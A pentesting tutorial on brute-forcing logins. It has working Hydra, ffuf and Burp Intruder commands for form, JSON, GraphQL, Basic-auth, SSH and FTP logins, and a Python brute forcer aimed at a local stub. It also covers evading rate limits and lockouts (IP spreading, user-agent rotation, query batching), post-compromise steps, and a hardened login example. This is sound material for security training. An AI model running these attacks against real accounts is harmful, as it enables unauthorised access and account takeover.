Brute force attacks target authentication systems by systematically trying many username and password combinations until one is accepted. They succeed when applications allow unlimited attempts, users choose weak passwords, error messages leak information, or controls such as rate limiting and lockout are missing. Brute forcing is one of the most direct and practical methods used during pentesting to validate password strength and identify authentication weaknesses.
Understanding Brute Force Attacks
A brute force attack works by automating login attempts. Attackers try:
- Every possible password (exhaustive search, only feasible for short or tightly constrained passwords)
- A large list of common passwords (dictionary attack)
- Password variations based on known patterns (rule-based mangling: seasons, years, appended digits, company name)
- Combinations from breached credential sets (credential stuffing, which relies on password reuse)
These attacks depend on speed, response analysis, and authentication flow weaknesses. A single weak password inside a system is often enough for full compromise.
Prerequisites for a Successful Brute Force Test
Before brute forcing, identify:
- Login endpoint
- Required parameters (username, password)
- Request type (GET, POST, JSON, URL-encoded, multipart)
- Error messages (do they differ between an unknown user and a wrong password?)
- Rate limiting or lockout controls (the lockout threshold tells you how many attempts per account you can make before locking out a real user)
- CSRF tokens or anti-automation mechanisms (a per-request token means every attempt must first fetch a fresh one; a CAPTCHA changes the approach entirely)
Understanding the authentication flow allows accurate automation.
Identifying the Login Request Structure
Capture a sample login request using a proxy like Burp Suite.
Example POST request:
POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

username=admin&password=1234
Extract parameters:
- username
- password
These values will be replaced with wordlists during brute forcing. Note anything else the request carries (cookies, a CSRF token, hidden form fields), since it must be supplied on every attempt.
Brute Forcing with Hydra (Practical)
Hydra is one of the most widely used online brute force tools; it speaks dozens of protocols, including HTTP forms, HTTP Basic auth, SSH, and FTP.
Basic Login Form Brute Force
hydra -l admin -P rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
Explanation:
- -l admin: single username to test
- -P rockyou.txt: password list
- /login: endpoint (the host and the module name come before the quoted option string)
- username=^USER^&password=^PASS^: POST body; Hydra substitutes ^USER^ and ^PASS^ on every attempt
- Invalid: text that appears in the response to a failed login. Hydra treats this third field as a failure string unless it is prefixed with S= for a success string (e.g. S=Dashboard). A wrong or missing failure string makes every attempt look like a hit.
When Hydra finds a match, it displays the valid password.
Brute Force with Multiple Usernames
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
Used when you must test multiple accounts.
Brute Forcing Basic Auth
hydra -L users.txt -P passwords.txt -s 80 -f target.com http-get /
http-get sends each pair in a Basic Authorization header against the given path; -s 80 sets the port and -f stops after the first valid pair is found.
Brute Forcing SSH
hydra -t 4 -L users.txt -P passwords.txt ssh://$IP
This targets exposed SSH services discovered during port scanning. Keep -t at 4 or below for SSH: sshd caps concurrent unauthenticated connections (MaxStartups), and more parallel tasks only produce connection errors and missed attempts.
Brute Forcing FTP
hydra -L users.txt -P passwords.txt ftp://$IP
FTP is often vulnerable due to weak or default credentials.
Brute Forcing with Burp Suite Intruder (Practical)
Burp Intruder enables manual brute forcing with full control over positions, payloads, and response analysis.
Step 1: Capture the login request
Send it to Intruder (Ctrl+I).
Step 2: Set Positions
Clear the auto-selected positions, then mark only the values you want to vary:
- username
- password
Pick the attack type to match: Sniper for one position (a known user, many passwords), Cluster bomb for every username and password combination, Pitchfork to pair line N of the user list with line N of the password list (credential stuffing).
Step 3: Add Payloads
Choose:
- User list
- Password list
If the form carries a CSRF token, add a recursive grep payload for it or a session handling rule that fetches a fresh token before each request; otherwise every attempt fails for the wrong reason.
Step 4: Configure Grep Match
Look for:
- “Welcome”
- “Dashboard”
- “Redirect”
A hit on one of these indicates success. Also grep for the failure text (e.g. “Invalid”) so you can sort on its absence.
Step 5: Launch Attack
Intruder sends one request per payload combination, and you detect success by sorting the results table on status code, response length, or the grep columns. Burp Community Edition throttles Intruder heavily, so use Hydra or ffuf for large wordlists.
Brute Forcing JSON Login Requests
For APIs using JSON authentication:
Example request:
POST /api/auth HTTP/1.1
Host: target.com
Content-Type: application/json
Content-Length: 30

{"user":"admin","pass":"1234"}
Hydra syntax:
hydra -l admin -P passwords.txt target.com http-post-form '/api/auth:{"user"\:"^USER^","pass"\:"^PASS^"}:F=Invalid:H=Content-Type\: application/json'
Three things differ from the form version: the option string is single-quoted so the shell keeps the JSON's double quotes; every colon inside the body and the header is escaped as \: because Hydra uses the colon as its field separator; and H= adds the JSON content type, since Hydra otherwise sends application/x-www-form-urlencoded. F= marks the failure string explicitly (use S= with a success marker such as a token field name instead). Adjust the field names to the actual structure.
Brute Forcing GraphQL Authentication
If login is a GraphQL mutation, the request is usually a POST to /graphql with the operation wrapped in a JSON "query" string:
POST /graphql HTTP/1.1
Host: target.com
Content-Type: application/json

{"query":"mutation { login(user:\"admin\", password:\"pass\") { token } }"}
(The { token } selection assumes login returns an object; adjust it to the real schema.) The password sits inside an escaped string, so mark that position in Intruder, or in the ffuf/Hydra body, and JSON-escape any payload containing quotes or backslashes. Success usually shows as a token or user object under data and failure as an errors array, so grep for "errors" as the failure indicator. If the server accepts query batching (a JSON array of operations in one request), many passwords can be tested per HTTP request, which sidesteps per-request rate limiting.
Identifying Successful Brute Force Indicators
Indicators include:
- Response status changes (e.g. 200 on failure but 302 on success)
- Redirects (a Location header pointing at a dashboard or home page)
- Larger or smaller response length
- Change in page title
- Different error message
- Missing “Invalid credentials” text
- A Set-Cookie header issuing a session cookie
Establish a baseline first: send two known-bad attempts and record their status, length, and body, then treat any response that deviates from that baseline as worth inspecting by hand. Automation tools highlight these differences.
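The JSON login above and the indicators listed in this section, put together as an added example that is not part of the original page: a small Python brute forcer that fingerprints each response (status, Location header, body length, presence of the failure text) and reports the first password whose fingerprint deviates from a baseline built from two known-bad attempts. It also treats a 429 as "retry later" rather than as a failed login, which is what slowing down on a rate-limited target means in practice. The target here is a constructed in-process stub of the hypothetical /api/auth endpoint with a made-up credential, so the script runs offline; against a real host (in scope only) you would replace the stub URL and nothing else.

```python
import json
import threading
import time
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# ---- constructed stand-in for the target: NOT a real application ----------
STUB_USERS = {"admin": "Summer2024!"}  # made-up credential for the demo
WORDLIST = ["123456", "password", "admin123", "letmein", "Summer2024!", "qwerty"]


class StubAuth(BaseHTTPRequestHandler):
    """Fake /api/auth: 401 + 'Invalid credentials' on failure, 302 to /dashboard
    on success, and a crude rate limit (429) on every fifth request."""
    attempts = 0

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = json.loads(self.rfile.read(length) or b"{}")
        StubAuth.attempts += 1
        if StubAuth.attempts % 5 == 0:
            self._reply(429, {"error": "slow down"}, {"Retry-After": "0"})
        elif STUB_USERS.get(body.get("user")) == body.get("pass"):
            self._reply(302, {"status": "ok"}, {"Location": "/dashboard"})
        else:
            self._reply(401, {"error": "Invalid credentials"})

    def _reply(self, code, payload, extra=None):
        data = json.dumps(payload).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        for name, value in (extra or {}).items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_stub():
    """Start the stub on an ephemeral port; returns (login URL, server)."""
    srv = HTTPServer(("127.0.0.1", 0), StubAuth)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_port}/api/auth", srv


# ---- the brute forcer: point it at a real URL only when in scope ----------
class NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface 3xx as HTTPError so the redirect itself is observable


OPENER = urllib.request.build_opener(NoRedirect)


def attempt(url, user, password, delay=0.0):
    """One JSON login attempt; returns (status, Location header, body bytes).
    A 429 is not a failed login: honour Retry-After and resend the same pair."""
    req = urllib.request.Request(
        url,
        data=json.dumps({"user": user, "pass": password}).encode(),
        headers={"Content-Type": "application/json", "User-Agent": "Mozilla/5.0"},
        method="POST",
    )
    while True:
        time.sleep(delay)
        try:
            with OPENER.open(req) as r:
                return r.status, r.headers.get("Location", ""), r.read()
        except urllib.error.HTTPError as e:
            if e.code == 429:
                time.sleep(float(e.headers.get("Retry-After", "1")))
                continue
            return e.code, e.headers.get("Location", ""), e.read()


def fingerprint(resp):
    """The success indicators from the page: status, redirect, length, failure text."""
    status, location, body = resp
    return (status, location, len(body), b"Invalid credentials" in body)


def brute_force(url, user, wordlist, delay=0.0):
    """Return (password, response) for the first attempt whose fingerprint differs
    from a baseline taken from two deliberately wrong passwords, else (None, None)."""
    base = [fingerprint(attempt(url, user, f"wrong-{i}", delay)) for i in (1, 2)]
    if base[0] != base[1]:
        raise RuntimeError("failure responses are not stable; pick better indicators")
    for pw in wordlist:
        resp = attempt(url, user, pw, delay)
        if fingerprint(resp) != base[0]:
            return pw, resp
    return None, None


if __name__ == "__main__":
    target, stub = start_stub()
    pw, resp = brute_force(target, "admin", WORDLIST, delay=0.05)
    print("valid password:", pw, "| status:", resp[0], "| redirect:", resp[1])
    stub.shutdown()
```

Fingerprinting on more than one field matters: an application that always answers 200 with the same error page usually still changes the response length or sets a session cookie on success. Extend fingerprint() with whatever the target's baseline shows, and inspect any deviation by hand before calling it a valid credential, since a WAF block page deviates from the baseline too.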
Avoiding Detection During Brute Force
Applications often implement defenses. Identify them first (lockout threshold, rate-limit window, WAF), then work within them:
- Slow down requests. In Hydra, -t 1 runs a single task and -W 5 waits five seconds between its connections; in ffuf, -rate 1 limits requests per second and -p 0.5-2 adds a random delay.
hydra -t 1 -W 5 ...
- Stay under the lockout threshold. If an account locks after N failures, either pace attempts per account across the lockout window or test a few likely passwords across many users instead (password spraying), which also avoids locking out real users during the engagement.
- Randomize User Agents. Use Burp Intruder or custom scripts to rotate headers.
- Spread attempts across multiple IPs. This bypasses per-IP rate limits or blocks; use a VPN or Tor only when the scope allows it.
Brute Force Against APIs
Modern applications use APIs for authentication. Check API routes separately: rate limiting applied to the browser login form does not necessarily cover them.
Common endpoints:
- /api/login
- /v1/auth
- /auth/token
- /session
Use ffuf or Burp Intruder to brute force. ffuf needs the method, the content type, and a filter that hides failures:
ffuf -u http://target.com/api/login -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'user=admin&pass=FUZZ' -w passwords.txt -fr 'Invalid'
For a JSON body use -H 'Content-Type: application/json' -d '{"user":"admin","pass":"FUZZ"}'. -fr drops every response whose body matches the failure text; anything left in the output is a candidate credential. Verify it by hand, since a 429 or a WAF block page also lacks the word "Invalid".
Common Brute Force Weaknesses in Applications
Brute force succeeds when the application:
- Allows unlimited attempts
- Does not lock or throttle accounts after repeated failures
- Uses predictable error messages (a fixed failure string is exactly what Hydra and ffuf filter on)
- Does not enforce rate limiting
- Does not require MFA
- Uses weak password policies
- Stores plaintext passwords, or fast unsalted hashes (trivial to crack offline once the store leaks)
- Allows login with partial credentials
- Leaks usernames through enumeration (different messages or response times for unknown versus known users)
These weaknesses are common across poorly designed authentication systems.
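The weaknesses above, as an added example in code that is not part of the original page: a constructed, in-memory login function written the weak way (plaintext store, unlimited attempts, distinct error messages that enumerate users) next to a hardened version that fixes three of them with a salted PBKDF2 hash compared in constant time, one generic error message (backed by a dummy record so unknown users cost the same as known ones), and per-account exponential backoff. The account, password, iteration count, and thresholds are all made up for the demo, and the `now` parameter is injectable only so the backoff can be shown without sleeping.

```python
import hashlib
import hmac
import os
import time

# ---- the weak design: plaintext store, two different error messages --------
USERS_PLAINTEXT = {"alice": "hunter2"}  # constructed demo account


def login_weak(user, password):
    """No throttle, a username oracle, and a plaintext comparison."""
    if user not in USERS_PLAINTEXT:
        return False, "Unknown user"  # tells the attacker which accounts exist
    if USERS_PLAINTEXT[user] != password:
        return False, "Invalid password"  # distinct text = easy Hydra failure string
    return True, "Welcome"


# ---- the hardened design ----------------------------------------------------
ITERATIONS = 100_000  # demo value; OWASP currently recommends 600k for PBKDF2-SHA256
MAX_FREE_FAILURES = 3  # failures allowed before backoff starts
MAX_BACKOFF = 900  # cap the throttle at 15 minutes
GENERIC_ERROR = "Invalid username or password"


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_record(password):
    salt = os.urandom(16)
    return {"salt": salt, "hash": _hash(password, salt), "failures": 0, "locked_until": 0.0}


USERS = {"alice": make_record("hunter2")}
# Unknown users are checked against a random record so the response time and
# the message are identical to a real account with a wrong password.
_DUMMY = make_record(os.urandom(16).hex())


def login_hardened(user, password, now=None):
    """Generic error text, constant-time hash comparison, and per-account
    exponential backoff: after MAX_FREE_FAILURES the account is throttled for
    2, 4, 8 ... seconds (capped) and the password is not even checked meanwhile."""
    now = time.time() if now is None else now
    rec = USERS.get(user, _DUMMY)
    if now < rec["locked_until"]:
        return False, GENERIC_ERROR  # throttled: same answer, no hash computed
    ok = hmac.compare_digest(_hash(password, rec["salt"]), rec["hash"])
    if user not in USERS:
        return False, GENERIC_ERROR  # same message, same cost as a real miss
    if ok:
        rec["failures"] = 0
        return True, "Welcome"
    rec["failures"] += 1
    extra = rec["failures"] - MAX_FREE_FAILURES
    if extra > 0:
        rec["locked_until"] = now + min(2 ** extra, MAX_BACKOFF)
    return False, GENERIC_ERROR


if __name__ == "__main__":
    # Constructed burst: the correct password is the fifth candidate.
    burst = ["123456", "password", "letmein", "qwerty", "hunter2"]
    print("weak:    ", [login_weak("alice", p)[0] for p in burst])
    print("hardened:", [login_hardened("alice", p, now=0.0)[0] for p in burst])
    print("after the backoff expires:", login_hardened("alice", "hunter2", now=60.0))
```

Run it and the burst shows the difference: the weak login accepts the fifth candidate, while the hardened one rejects all five because the account is already throttled when the right password arrives, and accepts it only after the backoff has expired. Per-account backoff alone does not stop password spraying across many accounts; that needs a per-IP or global rate limit and MFA, which the list above covers separately.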
How Brute Force Leads to Exploitation
Once you brute force credentials, the attack escalates:
- Log in using the discovered password
- Check user role and privileges
- Explore internal functionality
- Attempt privilege escalation
- Access sensitive data
- Upload malicious files or scripts
- Maintain persistence
- Compromise other accounts (the recovered password is worth spraying against other services, since reuse is common)
Valid credentials are frequently the shortest path from the login page to system takeover.
Intel Dump
- Brute force attacks automate login attempts to bypass weak authentication.
- Understanding request structure is essential before launching attacks.
- Hydra, Burp Intruder, and ffuf perform practical brute forcing.
- JSON, form-based, API, GraphQL, and basic auth flows can all be brute forced.
- Indicators of success include response length, codes, and messages.
- Brute force succeeds when the application lacks rate limiting or strong password enforcement.
- Successful brute forcing enables full account takeover and further exploitation.